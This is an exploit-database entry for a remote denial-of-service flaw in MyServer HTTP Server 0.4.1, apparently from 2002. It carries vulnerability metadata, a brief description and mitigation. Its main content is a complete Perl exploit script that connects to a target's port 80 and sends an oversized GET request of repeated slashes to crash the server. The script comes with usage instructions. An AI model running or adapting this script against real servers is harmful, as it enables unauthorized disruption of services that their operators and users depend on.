header-logo
Suggest Exploit
vendor:
MyServer HTTP Server
by:
deadbeat, uk2sec
7.5
CVSS
HIGH
Denial of Service
400
CWE
Product Name: MyServer HTTP Server
Affected Version From: 2000.4.1
Affected Version To: 2000.4.1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2002

MyServer HTTP Server Remote Denial of Service Vulnerability

MyServer HTTP server is prone to a remote denial of service attack due to a lack of sufficient bounds checking, performed on arguments that are supplied via malicious HTTP GET requests. A malicious HTTP GET request containing excessive data can trigger a segmentation fault in the server executable and the software will fail.

Mitigation:

Ensure that the server is configured to perform sufficient bounds checking on arguments supplied via malicious HTTP GET requests.
Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/8010/info

MyServer HTTP server has been reported prone to a remote denial of service attack.

The issue presents itself, likely due to a lack of sufficient bounds checking, performed on arguments that are supplied via malicious HTTP GET requests. It has been reported that a remote attacker may invoke a malicious HTTP GET request containing excessive data, that will supposedly trigger a segmentation fault in the server executable and the software will fail. 

#!/usr/bin/perl

#Myserver 0.4.1 Remote Denial of service ;)
#oh joy...
#deadbeat, uk2sec
#eip@oakey.no-ip.com
#deadbeat@sdf.lonestar.org

use IO::Socket;
$dos = "//"x100;
$request = "GET $dos"."HTTP/1.0\r\n\r\n";

$target = $ARGV[0];

print "\n\nMyserver 0.4.1 Remote Denial Of Service..\n";
print "deadbeat, uk2sec..\n";
print "usage: perl $0 <target>\n";
$sox = IO::Socket::INET->new(
        Proto=>"tcp",
        PeerPort=>"80",
        PeerAddr=>"$target"
)or die "\nCan't connect to $target..\n";
print $sox $request;
sleep 2;
close $sox;
print "Done...\n";